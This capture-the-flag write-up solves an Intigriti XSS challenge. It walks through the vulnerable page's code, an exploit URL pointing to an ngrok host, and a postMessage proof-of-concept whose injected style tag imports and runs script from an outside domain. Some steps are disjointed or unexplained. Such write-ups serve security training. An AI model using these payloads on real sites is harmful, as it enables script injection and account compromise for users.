- Category: Web
- Impact: Medium
- Solves: 12
Find a way to execute alert(document.domain) on the challenge page.
The solution:
- should leverage a cross site scripting vulnerability on this domain;
- should execute alert(document.domain);
- should not be self-XSS or related to MiTM attacks;
- should not use another challenge on the intigriti.io domain;
- should require no user interaction.
We have a web game challenge where we can frantically spam our spacebar key:
<html>
<head>
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title>Test Your Race Condition!</title>
</head>
<body style="padding:40px;">
<h1>Test Your Race Condition!</h1>
<section>Welcome to this gaming page! How fast are you in all games?</section><br>
<section>
We currently have just one game but more are in development. Check out the first game:
<a id="gameLink" href="https://admin:[email protected]/private/play.html?gameId=/challenge/game_barspacer.html">BarSpacer</a>!
</section>
<br>
<section>
If you are a developer, please check out <a href="/challenge/docs.html">the docs</a> for instructions on how to integrate your games with this website.
</section><br>
<section id="debug" style="display:none;">Get our server side code here (PW: intigriti):<a id="codeLink" href="/code.zip">code</a></section>
<script>
// our backend guys wanted to secure this but who cares about bots and hackers just add this in, until they complain
if (decodeURIComponent(document.URL).indexOf('debug=true') !== -1) {
codeLink.href = 'https://admin:debug@' + location.host + codeLink.pathname;
debug.style.display = null;
}
gameLink.href = 'https://admin:debug@' + location.host + gameLink.pathname + '?' + gameLink.href.split('?')[1];
</script>
</body>
</html>
A wget command won't produce anything interesting, except for the "Sorry, this app is optimized for Chromium based browser." message.
We can take inspiration from the title, previous Intigriti challenges and some fuzzing to find a way to get there quickly.
The given errors are fairly self-explanatory so we won't dwell much on them:
https://admin:debug:%3fdebug=true&gameId=%2f%2fip.ngrok-free.app%2Fpoc.htm&1%[email protected]/private/play.html?gameId=/challenge/game_debug.html#@challenge-0424.intigriti.io/private/play.html?
The top.postMessage method safely enables cross-origin communication between Window objects, e.g. between a page and a pop-up that it spawned or between a page and an iframe embedded within it. It is only safe, however, if the receiving page checks event.origin and validates the message content before acting on it; a listener that accepts any sender, as the challenge page does, can be driven from a page on an arbitrary origin.
Therefore we launch our Ngrok-python wrapper followed by the python -m http.server 1234 command to serve our payload (having regard to the above code) and get the alert popup:
<body><script>top.postMessage({nextGameId:"//challenge-0424.intigriti.io/challenge/game_debug.html#",action:"gotoNextGame"},"*");top.postMessage({nextGameId:"%</textarea><style/onload=import(/\\nj.rs/)>",action:"gotoNextGame"},"*");</script></body>
Avoid using JavaScript.
A great way to brush up on our classics! (See https://twitter.com/intigriti/status/1780264966752272625 for other great solutions.)